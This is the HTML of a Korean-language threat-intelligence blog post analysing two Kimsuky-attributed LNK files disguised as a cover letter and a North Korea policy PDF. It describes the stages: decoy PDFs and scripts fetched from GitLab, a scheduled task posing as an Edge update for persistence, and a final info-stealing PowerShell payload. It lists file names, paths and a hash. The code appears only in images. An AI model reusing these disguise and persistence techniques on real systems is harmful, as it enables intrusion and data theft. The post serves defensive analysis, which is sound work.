&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;TDS&lt;/span&gt;&lt;span&gt;에서&lt;/span&gt; &lt;span&gt;탐지된&lt;/span&gt; &lt;span&gt;악성&lt;/span&gt;&lt;span&gt; LNK &lt;/span&gt;&lt;span&gt;파일은&lt;/span&gt; &lt;span&gt;총&lt;/span&gt;&lt;span&gt; 2&lt;/span&gt;&lt;span&gt;종으로&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;각각&lt;/span&gt; &lt;span&gt;구직자의&lt;/span&gt; &lt;span&gt;자기소개서와&lt;/span&gt; &lt;span&gt;북한&lt;/span&gt; &lt;span&gt;관련&lt;/span&gt; &lt;span&gt;정책&lt;/span&gt; &lt;span&gt;문서로&lt;/span&gt; &lt;span&gt;위장하고&lt;/span&gt; &lt;span&gt;있습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;이소연 자기소개서.pdf.lnk&lt;/li&gt;
&lt;li&gt;2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e.lnk&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;739&quot; data-origin-height=&quot;359&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/loUFT/dJMcaduHDQu/hNR0immqJBc3sJRQOkR2q0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/loUFT/dJMcaduHDQu/hNR0immqJBc3sJRQOkR2q0/img.png&quot; data-alt=&quot;[그림 1] APT TDS에서 탐지된 악성 LNK 파일 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/loUFT/dJMcaduHDQu/hNR0immqJBc3sJRQOkR2q0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FloUFT%2FdJMcaduHDQu%2FhNR0immqJBc3sJRQOkR2q0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;739&quot; height=&quot;359&quot; data-origin-width=&quot;739&quot; data-origin-height=&quot;359&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] APT TDS에서 탐지된 악성 LNK 파일 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;438&quot; data-origin-height=&quot;468&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b9r88e/dJMb990eBf6/WeKAk1YiXz6bVuj1wZW5Xk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b9r88e/dJMb990eBf6/WeKAk1YiXz6bVuj1wZW5Xk/img.png&quot; data-alt=&quot;[그림 2] PDF 파일로 위장한 악성 LNK 파일&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b9r88e/dJMb990eBf6/WeKAk1YiXz6bVuj1wZW5Xk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb9r88e%2FdJMb990eBf6%2FWeKAk1YiXz6bVuj1wZW5Xk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;438&quot; height=&quot;468&quot; data-origin-width=&quot;438&quot; data-origin-height=&quot;468&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 2] PDF 파일로 위장한 악성 LNK 파일&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;분석&lt;/span&gt; &lt;span&gt;결과&lt;/span&gt; &lt;span&gt;해당&lt;/span&gt;&lt;span&gt; LNK &lt;/span&gt;&lt;span&gt;파일은&lt;/span&gt; &lt;span&gt;북&lt;/span&gt; &lt;span&gt;배후&lt;/span&gt; &lt;span&gt;공격그룹인&lt;/span&gt; &lt;span&gt;김수키&lt;/span&gt;&lt;span&gt;(Kimsuky) &lt;/span&gt;&lt;span&gt;그룹의&lt;/span&gt; &lt;span&gt;전형적인&lt;/span&gt; &lt;span&gt;LNK &lt;/span&gt;&lt;span&gt;기반&lt;/span&gt; &lt;span&gt;공격방식을&lt;/span&gt; &lt;span&gt;따르고&lt;/span&gt; &lt;span&gt;있어&lt;/span&gt; &lt;span&gt;이번&lt;/span&gt; &lt;span&gt;공격&lt;/span&gt; &lt;span&gt;역시&lt;/span&gt; &lt;span&gt;해당&lt;/span&gt; &lt;span&gt;그룹의&lt;/span&gt; &lt;span&gt;소행으로&lt;/span&gt; &lt;span&gt;판단됩니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;다만&lt;/span&gt;&lt;span&gt; C2 &lt;/span&gt;&lt;span&gt;서버로&lt;/span&gt; &lt;span&gt;깃허브&lt;/span&gt;&lt;span&gt;(GitHub)&lt;/span&gt;&lt;span&gt;를&lt;/span&gt; &lt;span&gt;활용하던&lt;/span&gt; &lt;span&gt;과거&lt;/span&gt; &lt;span&gt;방식과&lt;/span&gt; &lt;span&gt;달리&lt;/span&gt; &lt;span&gt;이번&lt;/span&gt; &lt;span&gt;공격에서는&lt;/span&gt; &lt;span&gt;깃랩&lt;/span&gt;&lt;span&gt;(GitLab) &lt;/span&gt;&lt;span&gt;플렛폼을&lt;/span&gt; &lt;span&gt;사용하였습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;두&lt;/span&gt; &lt;span&gt;파일의&lt;/span&gt; &lt;span&gt;내부&lt;/span&gt; &lt;span&gt;공격&lt;/span&gt; &lt;span&gt;구조와&lt;/span&gt; &lt;span&gt;최종&lt;/span&gt; &lt;span&gt;페이로드는&lt;/span&gt; &lt;span&gt;동일하며&lt;/span&gt;&lt;span&gt;, LNK &lt;/span&gt;&lt;span&gt;파일&lt;/span&gt; &lt;span&gt;실행&lt;/span&gt; &lt;span&gt;시&lt;/span&gt; &lt;span&gt;백그라운드에서&lt;/span&gt; &lt;span&gt;다단계&lt;/span&gt; &lt;span&gt;파워셸&lt;/span&gt;&lt;span&gt;(PowerShell) &lt;/span&gt;&lt;span&gt;스크립트가&lt;/span&gt; &lt;span&gt;실행되어&lt;/span&gt; &lt;span&gt;시스템&lt;/span&gt; &lt;span&gt;정보를&lt;/span&gt; &lt;span&gt;수집하고&lt;/span&gt; &lt;span&gt;암호화하여&lt;/span&gt; &lt;span&gt;외부로&lt;/span&gt; &lt;span&gt;전송합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격 흐름&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;1. &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;최초&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;감염&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;벡터&lt;/span&gt; &lt;span&gt;- LNK &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;파일&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;사용자가&lt;/span&gt; &lt;span&gt;정상&lt;/span&gt; &lt;span&gt;문서&lt;/span&gt; &lt;span&gt;파일로&lt;/span&gt; &lt;span&gt;오인하여&lt;/span&gt;&lt;span&gt; LNK &lt;/span&gt;&lt;span&gt;파일을&lt;/span&gt; &lt;span&gt;실행하면&lt;/span&gt;&lt;span&gt; LNK &lt;/span&gt;&lt;span&gt;내부의&lt;/span&gt; &lt;span&gt;난독화&lt;/span&gt; &lt;span&gt;된&lt;/span&gt; &lt;span&gt;파워셸&lt;/span&gt; &lt;span&gt;명령이&lt;/span&gt; &lt;span&gt;복호화&lt;/span&gt; &lt;span&gt;된&lt;/span&gt; &lt;span&gt;후&lt;/span&gt; &lt;span&gt;%APPDATA% &lt;/span&gt;&lt;span&gt;경로에&lt;/span&gt;&lt;span&gt; firefox.ps1 &lt;/span&gt;&lt;span&gt;이름으로&lt;/span&gt; &lt;span&gt;저장되어&lt;/span&gt; &lt;span&gt;실행됩니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1320&quot; data-origin-height=&quot;436&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bZzqfW/dJMcahxbnto/loq0p0UnXjIALk0cplFVqk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bZzqfW/dJMcahxbnto/loq0p0UnXjIALk0cplFVqk/img.png&quot; data-alt=&quot;[그림 3] LNK 파일 내부 난독화 된 파워셸 스크립트&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bZzqfW/dJMcahxbnto/loq0p0UnXjIALk0cplFVqk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbZzqfW%2FdJMcahxbnto%2Floq0p0UnXjIALk0cplFVqk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1320&quot; height=&quot;436&quot; data-origin-width=&quot;1320&quot; data-origin-height=&quot;436&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 3] LNK 파일 내부 난독화 된 파워셸 스크립트&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2. 1&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;차&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;드롭퍼&lt;/span&gt; &lt;span&gt;(firefox.ps1) - &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;탐지&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;회피와&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;지속&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;감염&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;환경&lt;/span&gt; &lt;/b&gt;&lt;b&gt;&lt;span&gt;구성&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Firefox.ps1 &lt;/span&gt;&lt;span&gt;파일은&lt;/span&gt; &lt;span&gt;공격의&lt;/span&gt; &lt;span&gt;초기&lt;/span&gt; &lt;span&gt;준비를&lt;/span&gt; &lt;span&gt;모두&lt;/span&gt; &lt;span&gt;담당하는&lt;/span&gt; &lt;span&gt;핵심&lt;/span&gt; &lt;span&gt;스크립트로서&lt;/span&gt; &lt;span&gt;실행&lt;/span&gt; &lt;span&gt;시&lt;/span&gt; &lt;span&gt;다음&lt;/span&gt; &lt;span&gt;네&lt;/span&gt; &lt;span&gt;가지&lt;/span&gt; &lt;span&gt;동작을&lt;/span&gt; &lt;span&gt;순차적으로&lt;/span&gt; &lt;span&gt;수행합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 129px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 14.3023%; height: 21px; text-align: center;&quot;&gt;파일명&lt;/td&gt;
&lt;td style=&quot;width: 21.6279%; height: 21px; text-align: center;&quot;&gt;변경 파일명&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 39.4186%; height: 21px; text-align: center;&quot;&gt;폴더 경로&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; height: 21px; text-align: center;&quot;&gt;행위&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 14.3023%; height: 21px;&quot;&gt;&lt;span&gt;docx.pdf&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.6279%; height: 21px;&quot;&gt;&lt;span&gt;이소연&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;자기소개서&lt;/span&gt;&lt;span&gt;.pdf&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 39.4186%; height: 21px;&quot;&gt;&lt;span&gt;%TEMP%&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; height: 21px;&quot;&gt;&lt;span&gt;디코이&lt;/span&gt;&lt;span&gt; PDF&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 35px;&quot;&gt;
&lt;td style=&quot;width: 14.3023%; height: 35px;&quot;&gt;&lt;span&gt;Yahoo.rtf&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.6279%; height: 35px;&quot;&gt;&lt;span&gt;Yahoo.jse&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 39.4186%; height: 35px;&quot;&gt;&lt;span&gt;%AppData%\Microsoft\Windows\Templates&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; height: 35px;&quot;&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;지속성&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;유지&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;스크립트&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 35px;&quot;&gt;
&lt;td style=&quot;width: 14.3023%; height: 35px;&quot;&gt;&lt;span&gt;Yahoo.jse &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.6279%; height: 35px;&quot;&gt;&lt;span&gt;facebook.ps1&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 39.4186%; height: 35px;&quot;&gt;&lt;span&gt;%AppData%\Microsoft\Windows\CloudStore&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; height: 35px;&quot;&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;2&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;차&lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;다운로더&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 14.3023%; height: 17px;&quot;&gt;&lt;span&gt;Ajobcall.txt&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.6279%; height: 17px;&quot;&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;news.ps1&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 39.4186%; height: 17px;&quot;&gt;&lt;span style=&quot;color: #1f2328;&quot;&gt;%AppData%&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; height: 17px;&quot;&gt;&lt;span&gt;최종&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;페이로드&lt;/span&gt;&lt;span&gt;(&lt;/span&gt;&lt;span&gt;정보탈취)&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 1] 단계별 생성 파일 목록&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2-1) &lt;/span&gt;&lt;span&gt;미끼&lt;/span&gt;&lt;span&gt; PDF &lt;/span&gt;&lt;span&gt;파일&lt;/span&gt; &lt;span&gt;표시&lt;/span&gt; &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;GitLab &lt;/span&gt;&lt;span&gt;저장소에서&lt;/span&gt; &lt;span&gt;미끼용&lt;/span&gt;&lt;span&gt; docx.pdf &lt;/span&gt;&lt;span&gt;를&lt;/span&gt; &lt;span&gt;내려받아&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp; &lt;/span&gt;%TEMP% &lt;/span&gt;&lt;span&gt;경로에&lt;/span&gt; &lt;span&gt;악성&lt;/span&gt;&lt;span&gt; LNK &lt;/span&gt;&lt;span&gt;파일에&lt;/span&gt; &lt;span&gt;따라&lt;/span&gt;&lt;span&gt; '&lt;/span&gt;&lt;span&gt;이소연&lt;/span&gt; &lt;span&gt;자기소개서&lt;/span&gt;&lt;span&gt;.pdf&amp;rsquo; &lt;/span&gt;&lt;span&gt;또는&lt;/span&gt; &lt;span&gt;북한대외전략분석&lt;/span&gt;&lt;span&gt;_&lt;/span&gt;&lt;span&gt;및&lt;/span&gt;&lt;span&gt;_&lt;/span&gt;&lt;span&gt;남북관계개선방안&lt;/span&gt;&lt;span&gt;.pdf &lt;/span&gt;&lt;span&gt;이름으로&lt;/span&gt; &lt;span&gt;저장하여&lt;/span&gt; &lt;span&gt;실행됩니다&lt;/span&gt;&lt;span&gt;.&lt;br /&gt;&lt;/span&gt;&lt;span&gt;사용자에게는&lt;/span&gt; &lt;span&gt;정상적인&lt;/span&gt;&lt;span&gt; PDF &lt;/span&gt;&lt;span&gt;문서파일&lt;/span&gt; &lt;span&gt;보여주며&lt;/span&gt; &lt;span&gt;의심을&lt;/span&gt; &lt;span&gt;피합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1183&quot; data-origin-height=&quot;763&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bkfqAO/dJMcafszyub/OYm8UDn9OJu5LoKjzXs5RK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bkfqAO/dJMcafszyub/OYm8UDn9OJu5LoKjzXs5RK/img.png&quot; data-alt=&quot;[그림 4] 미끼파일로 사용된 정상 PDF 파일 (1)&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bkfqAO/dJMcafszyub/OYm8UDn9OJu5LoKjzXs5RK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbkfqAO%2FdJMcafszyub%2FOYm8UDn9OJu5LoKjzXs5RK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1183&quot; height=&quot;763&quot; data-origin-width=&quot;1183&quot; data-origin-height=&quot;763&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 4] 미끼파일로 사용된 정상 PDF 파일 (1)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;576&quot; data-origin-height=&quot;752&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dl2VVm/dJMcahRsl9y/PfloN1Q6QgKzESCMEMr2M1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dl2VVm/dJMcahRsl9y/PfloN1Q6QgKzESCMEMr2M1/img.png&quot; data-alt=&quot;[그림 5] 미끼파일로 사용된 정상 PDF 파일 (2)&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dl2VVm/dJMcahRsl9y/PfloN1Q6QgKzESCMEMr2M1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdl2VVm%2FdJMcahRsl9y%2FPfloN1Q6QgKzESCMEMr2M1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;576&quot; height=&quot;752&quot; data-origin-width=&quot;576&quot; data-origin-height=&quot;752&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 5] 미끼파일로 사용된 정상 PDF 파일 (2)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2-2) &lt;/span&gt;&lt;span&gt;지속성&lt;/span&gt; &lt;span&gt;확보&lt;/span&gt;&lt;span&gt; - &lt;/span&gt;&lt;span&gt;스케줄러&lt;/span&gt; &lt;span&gt;등록&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;GitLab &lt;/span&gt;&lt;span&gt;저장소에서&lt;/span&gt;&lt;span&gt; Yahoo.rtf &lt;/span&gt;&lt;span&gt;파일을&lt;/span&gt; &lt;span&gt;다운로드&lt;/span&gt; &lt;span&gt;하여&lt;/span&gt;&lt;span&gt;%AppData%\Microsoft\Windows\Templates &lt;/span&gt;&lt;span&gt;경로에&lt;/span&gt; &lt;span&gt;Yahoo.jse &lt;/span&gt;&lt;span&gt;이름으로&lt;/span&gt; &lt;span&gt;저장한&lt;/span&gt; &lt;span&gt;뒤&lt;/span&gt;&lt;span&gt;, Yahoo.jse &lt;/span&gt;&lt;span&gt;악성&lt;/span&gt; &lt;span&gt;스크립트&lt;/span&gt; &lt;span&gt;파일이&lt;/span&gt; &lt;span&gt;반복&lt;/span&gt; &lt;span&gt;실행되도록&lt;/span&gt; &lt;span&gt;다음과&lt;/span&gt; &lt;span&gt;같은&lt;/span&gt; &lt;span&gt;이름으로&lt;/span&gt; &lt;span&gt;스케줄러를&lt;/span&gt; &lt;span&gt;등록합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;스케줄러명: MicrosoftEdgeUpdateTaskMachineGGswr{F60293632-35R-4A2F-96A8-03C3ECD693f5}&lt;/li&gt;
&lt;li&gt;실행 주기 : 10분 지연 시작, 이후 35분 간격 반복&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;820&quot; data-origin-height=&quot;204&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/L6J8I/dJMcag56so6/PExfl0KJC1xymNZQXXcstk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/L6J8I/dJMcag56so6/PExfl0KJC1xymNZQXXcstk/img.png&quot; data-alt=&quot;[그림 6] 등록된 작업 스케줄러&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/L6J8I/dJMcag56so6/PExfl0KJC1xymNZQXXcstk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FL6J8I%2FdJMcag56so6%2FPExfl0KJC1xymNZQXXcstk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;820&quot; height=&quot;204&quot; data-origin-width=&quot;820&quot; data-origin-height=&quot;204&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 6] 등록된 작업 스케줄러&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2-3) 2&lt;/span&gt;&lt;span&gt;차&lt;/span&gt; &lt;span&gt;다운로더&lt;/span&gt; &lt;span&gt;설치&lt;/span&gt; &lt;span&gt;- facebook.ps1 &lt;/span&gt;&lt;span&gt;생성&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Yahoo.jse &lt;/span&gt;&lt;span&gt;스크립트&lt;/span&gt; &lt;span&gt;내&lt;/span&gt; &lt;span&gt;인코딩된&lt;/span&gt; &lt;span&gt;문자열을&lt;/span&gt; &lt;span&gt;디코딩하여&lt;/span&gt; &lt;span&gt;메모리&lt;/span&gt; &lt;span&gt;내에서&lt;/span&gt; &lt;span&gt;2&lt;/span&gt;&lt;span&gt;차&lt;/span&gt; &lt;span&gt;파워셸&lt;/span&gt; &lt;span&gt;스크립트를&lt;/span&gt; &lt;span&gt;구성한&lt;/span&gt; &lt;span&gt;뒤&lt;/span&gt; &lt;span&gt;%AppData%\Microsoft\Windows\CloudStore\ &lt;/span&gt;&lt;span&gt;경로에&lt;/span&gt; &lt;span&gt;facebook.ps1 &lt;/span&gt;&lt;span&gt;이름으로&lt;/span&gt; &lt;span&gt;저장합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2-4) &lt;/span&gt;&lt;span&gt;최종&lt;/span&gt; &lt;span&gt;페이로드&lt;/span&gt;&lt;span&gt;(news.ps1) &lt;/span&gt;&lt;span&gt;즉시&lt;/span&gt; &lt;span&gt;실행&lt;/span&gt; &lt;span&gt;- news.ps1 &lt;/span&gt;&lt;span&gt;최초&lt;/span&gt; &lt;span&gt;실행&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
